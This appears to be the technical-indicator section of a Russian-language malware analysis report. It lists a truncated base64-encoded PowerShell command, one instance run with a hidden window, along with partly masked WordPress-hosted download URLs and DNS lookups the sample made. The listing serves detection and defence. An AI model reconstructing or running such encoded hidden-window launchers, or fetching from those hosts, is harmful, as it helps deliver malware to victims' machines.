Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGgAegB1AHYAdgB6AGoAZQBpAD0AJwBCAGYAbQBoAGQAYgBxAGwAdgByAGkAYQAnADsAJABOAGgAegB4AHcAegBzAGwAIAA9AC...
- http://lo##nce.vn/wp-admin/BVqEVcyx/
- http://th#####gthehumanity.com/wp-admin/zJfsDJE/
- http://ch###tylov.com/5v9gm2/8g7xjglq48-gxz4zp-65884/
- DNS ASK lo##nce.vn
- DNS ASK th#####gthehumanity.com
- DNS ASK ch###tylov.com
- DNS ASK po######dcourieretc.co.uk
- DNS ASK ta####uermorgen.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGgAegB1AHYAdgB6AGoAZQBpAD0AJwBCAGYAbQBoAGQAYgBxAGwAdgByAGkAYQAnADsAJABOAGgAegB4AHcAegBzAGwAIAA9AC...' (со скрытым окном)